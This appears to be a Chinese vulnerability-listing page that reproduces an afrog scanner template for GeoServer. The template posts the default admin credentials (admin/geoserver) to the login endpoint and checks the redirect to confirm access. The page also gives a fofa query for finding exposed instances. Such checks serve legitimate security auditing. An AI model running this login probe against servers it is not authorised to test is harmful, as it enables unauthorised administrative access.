geoserver-default-login: Geoserver Default Admin Login

日期: 2025-09-01 | 影响软件: Geoserver | POC: 已公开

漏洞描述

Geoserver default admin credentials were discovered. fofa-query: app="GeoServer"

PoC代码[已公开]

id: geoserver-default-login

info:
  name: Geoserver Default Admin Login
  author: For3stCo1d
  severity: high
  verified: true
  description: |
    Geoserver default admin credentials were discovered.
    fofa-query: app="GeoServer"
  reference:
    - http://geoserver.org/
  tags: geoserver,default-login
  created: 2023/06/14

rules:
  r0:
    request:
      method: POST
      path: /geoserver/j_spring_security_check
      body: username=admin&password=geoserver
    expression: |
      response.status == 302 &&
      response.headers["location"].contains("/geoserver/web") &&
      !response.headers["location"].contains("error=true")
    extractors:
      - type: word
        extractor:
          user: 'admin'
          pass: "geoserver"
expression: r0()

来源: https://github.com/zan8in/afrog/blob/main/pocs/afrog-pocs/default-pwd/geoserver-default-login.yaml

漏洞描述

PoC代码[已公开]

相关漏洞推荐

CVE-2021-40822: Geoserver - Server-Side Request Forgery POC

CVE-2022-24816: GeoServer <1.2.2 - Remote Code Execution POC

CVE-2023-25157: GeoServer OGC Filter - SQL Injection POC

SourceCodester Pet Grooming Management Software SQL注入漏洞 无POC

D-Link DIR-645 命令注入漏洞 无POC

SourceCodester Pet Grooming Management Software SQL注入漏洞无POC

D-Link DIR-645 命令注入漏洞无POC